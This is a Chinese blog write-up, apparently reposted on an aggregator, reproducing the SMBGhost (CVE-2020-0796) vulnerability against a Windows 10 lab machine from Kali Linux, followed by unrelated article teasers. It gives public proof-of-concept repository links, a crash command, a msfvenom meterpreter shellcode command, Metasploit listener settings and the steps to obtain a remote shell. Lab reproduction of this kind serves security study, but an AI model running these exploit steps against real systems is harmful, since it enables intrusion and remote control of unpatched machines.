永恒之黑_CVE-2020-0796漏洞复现

永恒之黑:CVE-2020-0796漏洞复现

目录

  • 永恒之黑:CVE-2020-0796漏洞复现
    • 漏洞介绍
    • 漏洞影响范围
    • 漏洞复现
      • 1.环境准备
      • 2.复现过程

漏洞介绍

本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。

漏洞影响范围

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows Server, Version 1903 (Server Core installation)

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows Server, Version 1909 (Server Core installation)

漏洞复现

1.环境准备

win10靶机:必须关闭防火墙

kali攻击机

2.复现过程

poc和getshell工具地址:
git clone https://github.com/eerykitty/CVE-2020-0796-PoC
git clone https://github.com/chompie1337/SMBGhost_RCE_PoC

首先关闭靶机的防火墙

image-20230828210600291

检测连通性,kali和靶机是否可以互通

image-20230828211021424

使用漏洞检测工具检测漏洞是否存在

CVE-2020-0796-Scanner.exe

image-20230828210717438

说明存在漏洞,可以进行攻击

漏洞利用-使用蓝屏

原理:该脚本连接到目标主机,并在转移头中设置了错误的偏移量字段的情况下压缩了身份验证的请求,从而导致解压缩器缓冲溢出并导致目标崩溃

python CVE-2020-0796.py 192.168.100.149

在kali直接敲命令下载工具:git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git

运行出现报错,安装对应的模块即可

出现蓝屏现象

image-20230828211413125

kali进入msf,使用msf生成木马。

并查看是否生成功

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python > shellcode.txt
#生成的木马文件名自定义

image-20230828212525984

打开生成的脚步查看

image-20230828212659380

将msf中生成的shellcode.txt生成的code,替换到SMBGhost_RCE_poc下载文件中的exploit.py的USER_PAYLOAD参数(将原来的删除掉),并把参数buf改为USER_PAYLOAD,替换完如下图

image-20230828213145176

进入kali中的msf模块打开监听模块

use exploit/multi/handler #选择监听模块
set payload windows/x64/meterpreter/bind_tcp #使用监听模块
set lport 4444  #监听端口
set rhost 靶机IP #被监听主机
run #运行

在这里插入图片描述

run运行

在这里插入图片描述
image-20230828214720129

出现meterpreter >说明已经建立了一个会话连接

image-20230830230438813

如果没反应,反复多次测试即可,多次run,回车

若出现多次蓝屏,可重启靶机再次尝试

image-20230830230223917

攻击成功

获取shell权限

输入shell即可

输入以下代码解决中午乱码问题
chcp 65001

image-20230830230317492

攻击完成

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/101296.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

lv3 嵌入式开发-4 linux shell命令(文件搜索、文件处理、压缩)

目录 1 查看文件相关命令 1.1 常用命令 1.2 硬链接和软链接 2 文件搜索相关命令 2.1 查找文件命令 2.2 查找文件内容命令 2.3 其他相关命令 3 文件处理相关命令 3.1 cut 3.2 sed 过滤 3.3 awk 匹配 4 解压缩相关命令 4.1 解压缩文件的意义 4.2 解压缩相关命令 1 …

SPSS多元线性回归数据解读

前文我们总结了SPSS安装流程和多元线性回归操作案例: 链接如下: SPSS安装:保姆级SPSS图文安装教程_追忆苔上雪的博客-CSDN博客 SPSS多元线性回归操作案例:SPSS多元线性回归操作入门实例_追忆苔上雪的博客-CSDN博客 接下来针对…

2023 最新 Git 分布式版本控制系统介绍和下载安装使用教程

Git 基本概述 Git 是一个开源的分布式版本控制系统,用于敏捷高效地处理任何或大或小的项目。 集中式和分布式的区别? 最常见的集中式版本控制系统是SVN,版本库是集中放在中央处理器中的,而干活的时候,用的都是自己电…

K8S最新版本集群部署(v1.28) + 容器引擎Docker部署(下)

温故知新 📚第三章 Kubernetes各组件部署📗安装kubectl(可直接跳转到安装kubeadm章节,直接全部安装了)📕下载kubectl安装包📕执行kubectl安装📕验证kubectl 📗安装kubead…

2023年09月编程语言流行度排名

点击查看最新编程语言流行度排名(每月更新) 2023年09月编程语言流行度排名 编程语言流行度排名是通过分析在谷歌上搜索语言教程的频率而创建的 一门语言教程被搜索的次数越多,大家就会认为该语言越受欢迎。这是一个领先指标。原始数据来自…

mac制作ssl证书|生成自签名证书,nodejs+express在mac上搭建https+wss(websocket)服务器

注意 mac 自带 openssl 所以没必要像 windows 一样先安装 openssl,直接生成即可 生成 ssl/自签名 证书 生成 key # 生成rsa私钥,des3算法,server_ssl.key是秘钥文件名 1024位强度 openssl genrsa -des3 -out server_ssl.key 1024让输入两…

EOCR-AR电机保护器自动复位的启用条件说明

为适用不同的现场使用需求,施耐德韩国公司推出了带有自动复位功能的模拟型电动机保护器-EOCR-AR。EOCR-AR电机保护器具有过电流、缺相、堵转保护功能,还可根据实际需要设置自动复位时间。 EOCR-AR自动复位的设置方法 如上图,R-TIME旋钮是自动…

stm32f1xx单片机拦截中断源代码

这个是实现后的效果,可以看到已经没有中断的效果了 这个是拦截前的效果可以看到电平是在变化的 实现原理非常简单:一句话搞定: if(TIM2->CNTTIM2->ARR-5)TIM2->CNT-5; 以下是完整的代码:是用来补充说明和筹字数的 /* …

这些国外客户真直接

最近在某平台上遇到的客户,很大一部分都是非英语国家的客户,然而他们也有很多共性的习惯。 第一种:直接表达自己对这个产品感兴趣,然后接下来就没有下文了,而之所以可以看得懂,则是借助平台本身的翻译系统&…

解决Nacos服务器连接问题:一次完整的排查经验分享

🌷🍁 博主猫头虎(🐅🐾)带您 Go to New World✨🍁 🦄 博客首页——🐅🐾猫头虎的博客🎐 🐳 《面试题大全专栏》 🦕 文章图文…

对接西部数据Western Digital EDI 系统

近期我们为国内某知名电子产品企业提供EDI解决方案,采用知行之桥 EDI 系统作为核心组件,成功与西部数据Western Digital(简称西数)建立EDI连接,实现数据安全且自动化传输。 EDI实施需求 EDI连接 传输协议:A…

耕地单目标语义分割实践——Deeplab3+语义分割

耕地单目标语义分割实践系列文章: [1*] 语义分割实践数据集制作—以Sentinel-2 MSI数据为例_doll ~CJ的博客-CSDN博客 [2*] 耕地单目标语义分割实践——Pytorch网络过程实现理解_doll ~CJ的博客-CSDN博客 [3*] 基于Pytorch的神经网络部分…